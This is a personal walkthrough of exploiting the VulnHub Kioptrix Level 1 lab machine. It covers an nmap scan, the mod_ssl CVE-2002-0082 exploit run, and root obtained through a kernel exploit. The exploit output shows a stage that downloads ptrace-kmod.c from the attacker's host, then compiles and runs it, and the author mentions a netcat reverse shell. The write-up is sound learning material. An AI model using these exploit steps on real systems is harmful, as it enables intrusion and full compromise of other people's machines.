VulnHub Kioptrix : Level 1
6 March, 2021
Machine: https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Beginning with an nmap scan, it showed HTTP on port 80, SMB on port 139 and HTTPS on port 443
kali@kali> sudo nmap -A 192.168.56.101
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-02 23:45 EST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.101
Host is up (0.0018s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1024/tcp status
|_ 100024 1 1024/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-09-26T09:32:06
|_Not valid after: 2010-09-26T09:32:06
|_ssl-date: 2021-03-03T15:16:31+00:00; +10h29m59s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
1024/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:12:B0:6B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop
Host script results:
|_clock-skew: 10h29m58s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 1.80 ms 192.168.56.101
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.87 seconds
I tried Nikto for the first time and it showed that the version of mod_ssl being used was vulnerable to a remote buffer overflow. Searching for it, it was pretty simple
to find, CVE-2002-0082
kali@kali> ./764 0x6b 192.168.56.101
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
* *******************************************************************
* * by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* * #hackarena irc.brasnet.org *
* * TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* * #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* * #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
* *******************************************************************
*
* Establishing SSL connection
* cipher: 0x4043808c ciphers: 0x80f8050
* Ready to send shellcode
* Spawning shell...
* bash: no job control in this shell
* bash-2.05$
* -exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304
* --14:17:23-- https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
* => `ptrace-kmod.c'
* Connecting to dl.packetstormsecurity.net:443...
* dl.packetstormsecurity.net: Host not found.
* gcc: ptrace-kmod.c: No such file or directory
* gcc: No input files
* rm: cannot remove `ptrace-kmod.c': No such file or directory
* bash: ./p: No such file or directory
* bash-2.05$
* bash-2.05$ ls
* ls
* bash-2.05$ whoami
* whoami
* apache
* bash-2.05$
Initially I was using the exploit incorrectly where I modified the second command to a netcat based reverse shell, didn't work at all. So I revisited to original code and realised
that ptrace-kmod.c is another kernel exploit altogether, that would escalate the shell to root. So after compiling the original exploit I was able to get root.
kali@kali> ./764 0x6b 192.168.56.101
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
* *******************************************************************
* * by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* * #hackarena irc.brasnet.org *
* * TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* * #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* * #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
* *******************************************************************
*
* Establishing SSL connection
* cipher: 0x4043808c ciphers: 0x80f81c8
* Ready to send shellcode
* Spawning shell...
* bash: no job control in this shell
* bash-2.05$
* c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; 2.168.56.103:8000/ptrace-kmod.
* --14:30:50-- http://192.168.56.103:8000/ptrace-kmod.c
* => `ptrace-kmod.c'
* Connecting to 192.168.56.103:8000... connected!
* HTTP request sent, awaiting response... 200 OK
* Length: 3,737 [text/x-csrc]
*
* 0K ... 100% @ 214.67 KB/s
*
* 14:30:50 (214.67 KB/s) - `ptrace-kmod.c' saved [3737/3737]
*
* [+] Attached to 1657
* [+] Signal caught
* [+] Shellcode placed at 0x4001189d
* [+] Now wait for suid shell...
* whoami
* root
* id
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
There is another method that requires exploiting SMB using MSF that I didn't try since the exploit is part of MSF